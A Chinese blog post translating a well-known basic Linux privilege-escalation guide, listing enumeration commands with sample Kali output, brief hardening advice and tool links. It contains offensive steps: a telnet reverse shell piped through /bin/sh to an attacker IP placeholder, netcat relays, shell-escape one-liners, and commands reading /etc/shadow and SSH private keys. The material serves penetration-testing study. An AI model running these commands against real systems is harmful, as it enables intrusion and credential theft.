Linux提权攻击思路

0

这篇文章算是翻译并转载了国外hacker的博客~ 原文链接:https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 开始看之前请注意:这只是一篇基础和简略的介绍,不是每条命令都对各种各样的linux通用。实战中最重要的是,不要错过任何细节。 Linux提权大致思路:

  • 收集 – 信息越多越好
  • 处理 – 从信息中整理出有用的数据并分析,按优先级排序
  • 搜索 – 知道搜索什么以及到哪里去搜索
  • 适应 – 对exploit进行修改完善来适应靶机环境
  • 尝试 – 准备好遇到未知的error并继续尝试
    我以kali linux(Debian) i386做测试。

操作系统

查看系统版本

$ cat /etc/issue
Kali GNU/Linux Rolling \n \l
$ cat /etc/*-release
DISTRIB_ID=Kali
DISTRIB_RELEASE=kali-rolling
DISTRIB_CODENAME=kali-rolling
DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2016.2"
VERSION_ID="2016.2"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.kali.org/"
SUPPORT_URL="http://forums.kali.org/"
BUG_REPORT_URL="http://bugs.kali.org/"

查看内核版本

$ cat /proc/version
Linux version 4.8.0-kali2-686-pae (devel@kali.org) (gcc version 5.4.1 20161019 (Debian 5.4.1-3) ) $1 SMP Debian 4.8.11-1kali1 (2016-12-08)
$ uname -a
Linux kali2 4.8.0-kali2-686-pae #1 SMP Debian 4.8.11-1kali1 (2016-12-08) i686 GNU/Linux
$ uname -mrs
Linux 4.8.0-kali2-686-pae i686
$ rpm -q kernel
package kernel is not installed
$ dmesg | grep Linux
[    0.000000] Linux version 4.8.0-kali2-686-pae (devel@kali.org) (gcc version 5.4.1 20161019 (Debian 5.4.1-3) ) $1 SMP Debian 4.8.11-1kali1 (2016-12-08)
[    0.067253] ACPI: [Firmware Bug]: BIOS _OSI(Linux) query ignored
[    1.050165] Linux agpgart interface v0.103
[    1.226616] usb usb1: Manufacturer: Linux 4.8.0-kali2-686-pae uhci_hcd
[    1.241963] usb usb2: Manufacturer: Linux 4.8.0-kali2-686-pae ehci_hcd
[    5.315410] media: Linux media interface: v0.10
[    5.316518] Linux video capture interface: v2.00
$ ls /boot | grep vmlinuz-
vmlinuz-4.6.0-kali1-686-pae
vmlinuz-4.8.0-kali2-686-pae

查看环境变量

$ cat /etc/profile
$ cat /etc/bashrc
$ cat ~/.bash_profile
$ cat ~/.bashrc
$ cat ~/.bash_logout
$ env
$ set

是否有打印机

$ lpstat -a
bash: lpstat: command not found

应用程序&服务

哪些服务在运行?每个服务有什么用户权限?

$ ps aux
$ ps -ef
$ top
$ cat /etc/services

哪些服务以root运行?在这些服务中,哪些是可以被攻击的?

$ ps aux | grep root
$ ps -ef | grep root

安装了哪些程序,版本是什么?正在运行的有哪些?

$ ls -alh /usr/bin/
$ ls -alh /sbin/
$ dpkg -l
$ rpm -qa
$ ls -alh /var/cache/apt/archivesO
ls: cannot access '/var/cache/apt/archivesO': No such file or directory
$ ls -alh /var/cache/yum/
ls: cannot access '/var/cache/yum/': No such file or directory

有没有某个服务配置失误,或者安装了可被攻击的插件?

查看各种服务的配置文件。

$ cat /etc/syslog.conf
$ cat /etc/chttp.conf
$ cat /etc/lighttpd.conf            
$ cat /etc/cups/cupsd.conf
$ cat /etc/inetd.conf               #inetd
$ cat /etc/apache2/apache2.conf     #apache
$ cat /etc/my.conf                  #mysql
$ cat /etc/httpd/conf/httpd.conf    #httpd
$ cat /opt/lampp/etc/httpd.conf
$ ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

有没有定时的任务?

针对crontab。

$ crontab -l
$ ls -alh /var/spool/cron
$ ls -al /etc/ | grep cron
$ ls -al /etc/cron*
$ cat /etc/cron*
$ cat /etc/at.allow
$ cat /etc/at.deny
$ cat /etc/cron.allow
$ cat /etc/cron.deny
$ cat /etc/crontab
$ cat /etc/anacrontab
$ cat /var/spool/cron/crontabs/root

有没有明文的用户名或密码?

$ grep -i user [filename]$ grep -i pass [filename]$ grep -C 5 "password" [filename]$ find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   #Joomla

通信网络

网卡(NIC)有哪些?是否连接到某个网络?

$ /sbin/ifconfig -a
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.158.171  netmask 255.255.255.0  broadcast 172.16.158.255
        inet6 fe80::20c:29ff:fe6b:6737  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:6b:67:37  txqueuelen 1000  (Ethernet)
        RX packets 267  bytes 27100 (26.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 196  bytes 18001 (17.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 19  base 0x2000  
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 160  bytes 12960 (12.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 160  bytes 12960 (12.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
$ cat /etc/network/
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
 
source /etc/network/interfaces.d/*
 
# The loopback network interface
auto lo
iface lo inet loopback
 
$ cat /etc/sysconfig/network
cat: /etc/sysconfig/network: No such file or directory

查看网络配置。DHCP服务器?DNS服务器?网关(Gateway)?

$ cat /etc/resolv.conf
# Generated by NetworkManager
search localdomain
nameserver 172.16.158.2
 
$ cat /etc/sysconfig/network
cat: /etc/sysconfig/network: No such file or directory
 
$ cat /etc/networks
default     0.0.0.0
loopback    127.0.0.0
link-local  169.254.0.0
 
$ iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
 
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         
 
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination 
 
$ hostname
kali2
 
$ dnsdomainname

和此系统有通信的其他用户或主机?

$ lsof -i
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
dhclient 20840 root    6u  IPv4  39114      0t0  UDP *:bootpc 
 
$ lsof -i :80
 
$ grep 80 /etc/services     #80端口服务,当然会包括1080这种含有80的端口
 
$ netstat -antup
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
udp        0      0 0.0.0.0:68              0.0.0.0:*                           20840/dhclient
 
$ netstat -antpx        #比较多,这里就不显示了
 
$ netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
udp        0      0 0.0.0.0:68              0.0.0.0:*                           20840/dhclient
 
$ chkconfig --list
bash: chkconfig: command not found
 
$ chkconfig --list | grep 3:on
bash: chkconfig: command not found
 
$ last
root     tty7         :0               Mon Jan 30 19:57    gone - no logout
reboot   system boot  4.8.0-kali2-686- Mon Jan 30 19:57   still running
 
wtmp begins Sat Jan 21 09:51:09 2017
 
$ w
 10:31:50 up  3:30,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty7     :0               Mon19   14:34m 13.12s 13.12s /usr/lib/xorg/X

IP和MAC地址?

$ arp -e
Address                  HWtype  HWaddress           Flags Mask            Iface
172.16.158.2             ether   00:50:56:f7:b9:3f   C                     eth0
172.16.158.254           ether   00:50:56:f2:64:81   C                     eth0
 
$ route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         172.16.158.2    0.0.0.0         UG    100    0        0 eth0
172.16.158.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
172.16.158.0    0.0.0.0         255.255.255.0   U     100    0        0 eth0
 
$ /sbin/route -nee
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface    MSS   Window irtt
0.0.0.0         172.16.158.2    0.0.0.0         UG    100    0        0 eth0     0     0      0
172.16.158.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0     0     0      0
172.16.158.0    0.0.0.0         255.255.255.0   U     100    0        0 eth0     0     0      0

有没有可能嗅探数据包?能获取什么?监听实时流量。

$ tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21
bash: tcpdump: command not found        #没有装tcpdump...

Note: tcpdump tcp dst [ip][port]and tcp dst [ip][port]

拿到shell没?可以交互吗?

$ nc -lvp 4444    # Attacker. Input (Commands)
$ nc -lvp 4445    # Attacker. Ouput (Results)
$ telnet [atackers ip]44444 | /bin/sh | [local ip]44445    # On the targets system. Use the attackers IP!

Note: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

有没有可能端口转发?重定向并从另一个角度分析。

Note: http://www.boutell.com/rinetd/

Note: http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

Note: http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip

Note: FPipe.exe -l [local port]-r [remote port]-s [local port][local IP]

$ FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

Note: ssh -[L/R] [local port]:[remote ip]:[remote port][local user]@[local ip]

$ ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
$ ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

Note: mknod backpipe p ; nc -l -p [remote port]< backpipe | nc [local IP][local port]>backpipe

$ mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe    # Port Relay
$ mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
$ mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

可不可以用tunnel?

$ ssh -D 127.0.0.1:9050 -N [username]@[ip]$ proxychains ifconfig

机密信息&用户

你的身份?哪些用户已经登录?每个用户有哪些权限?

$ id
$ who
$ w
$ last
$ cat /etc/passwd | cut -d: -f1    # List of users
$ grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
$ awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
$ cat /etc/sudoers
$ sudo -l

能找到哪些敏感文件?

$ cat /etc/passwd
$ cat /etc/group
$ cat /etc/shadow
$ ls -alh /var/mail/

如果能进入home目录下,有没有一些吸引你的东西?

$ ls -ahlR /root/
$ ls -ahlR /home/

有没有密码存在:脚本,数据库,配置文件,log文件?默认路径和位置。

$ cat /var/apache2/config.inc
$ cat /var/lib/mysql/mysql/user.MYD
$ cat /root/anaconda-ks.cfg

查看各种history,你登录的用户之前做过什么?

$ cat ~/.bash_history
$ cat ~/.nano_history
$ cat ~/.atftp_history
$ cat ~/.mysql_history
$ cat ~/.php_history

有哪些用户信息能被发现?

$ cat ~/.bashrc
$ cat ~/.profile
$ cat /var/mail/root
$ cat /var/spool/mail/root

可以找到私钥信息吗?

$ cat ~/.ssh/authorized_keys
$ cat ~/.ssh/identity.pub
$ cat ~/.ssh/identity
$ cat ~/.ssh/id_rsa.pub
$ cat ~/.ssh/id_rsa
$ cat ~/.ssh/id_dsa.pub
$ cat ~/.ssh/id_dsa
$ cat /etc/ssh/ssh_config
$ cat /etc/ssh/sshd_config
$ cat /etc/ssh/ssh_host_dsa_key.pub
$ cat /etc/ssh/ssh_host_dsa_key
$ cat /etc/ssh/ssh_host_rsa_key.pub
$ cat /etc/ssh/ssh_host_rsa_key
$ cat /etc/ssh/ssh_host_key.pub
$ cat /etc/ssh/ssh_host_key

文件系统

哪些配置文件可以被写在/etc/?可以对某个服务重新配置吗?

$ ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
$ ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null       # Owner
$ ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
$ ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null        # Other
 
$ find /etc/ -readable -type f 2>/dev/null               # Anyone
$ find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

/var/路径下能发现什么?

$ ls -alh /var/log
$ ls -alh /var/mail
$ ls -alh /var/spool
$ ls -alh /var/spool/lpd
$ ls -alh /var/lib/pgsql
$ ls -alh /var/lib/mysql
$ cat /var/lib/dhcp3/dhclient.leases

有没有(隐藏)设置/文件在网站上?有没有和数据库信息有关的设置文件?

$ ls -alhR /var/www/
$ ls -alhR /srv/www/htdocs/
$ ls -alhR /usr/local/www/apache22/data/
$ ls -alhR /opt/lampp/htdocs/
$ ls -alhR /var/www/html/

log文件里有没有信息?

$ cat /etc/httpd/logs/access_log
$ cat /etc/httpd/logs/access.log
$ cat /etc/httpd/logs/error_log
$ cat /etc/httpd/logs/error.log
$ cat /var/log/apache2/access_log
$ cat /var/log/apache2/access.log
$ cat /var/log/apache2/error_log
$ cat /var/log/apache2/error.log
$ cat /var/log/apache/access_log
$ cat /var/log/apache/access.log
$ cat /var/log/auth.log
$ cat /var/log/chttp.log
$ cat /var/log/cups/error_log
$ cat /var/log/dpkg.log
$ cat /var/log/faillog
$ cat /var/log/httpd/access_log
$ cat /var/log/httpd/access.log
$ cat /var/log/httpd/error_log
$ cat /var/log/httpd/error.log
$ cat /var/log/lastlog
$ cat /var/log/lighttpd/access.log
$ cat /var/log/lighttpd/error.log
$ cat /var/log/lighttpd/lighttpd.access.log
$ cat /var/log/lighttpd/lighttpd.error.log
$ cat /var/log/messages
$ cat /var/log/secure
$ cat /var/log/syslog
$ cat /var/log/wtmp
$ cat /var/log/xferlog
$ cat /var/log/yum.log
$ cat /var/run/utmp
$ cat /var/webmin/miniserv.log
$ cat /var/www/logs/access_log
$ cat /var/www/logs/access.log
$ ls -alh /var/lib/dhcp3/
$ ls -alh /var/log/postgresql/
$ ls -alh /var/log/proftpd/
$ ls -alh /var/log/samba/
 
#Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

Note: http://www.thegeekstuff.com/2011/08/linux-var-log-files/

如果可执行命令被限制,可以突破限制吗?

$ python -c 'import pty;pty.spawn("/bin/bash")'
$ echo os.system('/bin/bash')
$ /bin/sh -i

文件系统如何挂载的?

$ mount
$ df -h

有没有未挂载的文件系统?

$ cat /etc/fstab

What “Advanced Linux File Permissions” are used? Sticky bits, SUID & GUID

$ find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
$ find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
$ find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
 
$ find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
$ for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
 
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
$ find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Where can written to and executed from? A few ‘common’ places: /tmp, /var/tmp, /dev/shm

$ find / -writable -type d 2>/dev/null      # world-writeable folders
$ find / -perm -222 -type d 2>/dev/null     # world-writeable folders
$ find / -perm -o w -type d 2>/dev/null     # world-writeable folders
 
$ find / -perm -o x -type d 2>/dev/null     # world-executable folders
 
$ find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # world-writeable & executable folders

Any “problem” files? Word-writeable, “nobody” files

$ find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
$ find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files

编写exploit代码

查看已安装的开发工具或者支持的语言。

$ find / -name perl*
$ find / -name python*
$ find / -name gcc*
$ find / -name cc

可以上传文件吗?

$ find / -name wget
$ find / -name nc*
$ find / -name netcat*
$ find / -name tftp*
$ find / -name ftp

寻找exploit代码

http://www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.securityfocus.com

http://www.exploitsearch.net

http://metasploit.com/modules/

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com

Finding more information regarding the exploit

http://www.cvedetails.com

http://packetstormsecurity.org/files/cve/[CVE]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) “Common” exploits. Warning. Pre-compiled binaries files. Use at your own risk

http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/

http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

预防措施

希望自己的服务器被getroot吗?Orz

那么就按以下步骤检查吧:

是否及时更新:内核,系统,程序,插件,web服务?
可以设置cron来定期检查更新。

是否所有服务都按照它们所需的最低权限运行?
比如,永远不要以root运行MySQL!

这里有一些自动化检查脚本:

http://pentestmonkey.net/tools/unix-privesc-check/

http://labs.portcullis.co.uk/application/enum4linux/

http://bastille-linux.sourceforge.net

其他guide&链接

Enumeration

http://www.0daysecurity.com/penetration-testing/enumeration.html

http://www.microloft.co.uk/hacking/hacking3.htm

Misc

http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf

http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall09.pdf

http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

Leave A Reply

苏ICP备16066660号-1

苏公网安备 32011502010432号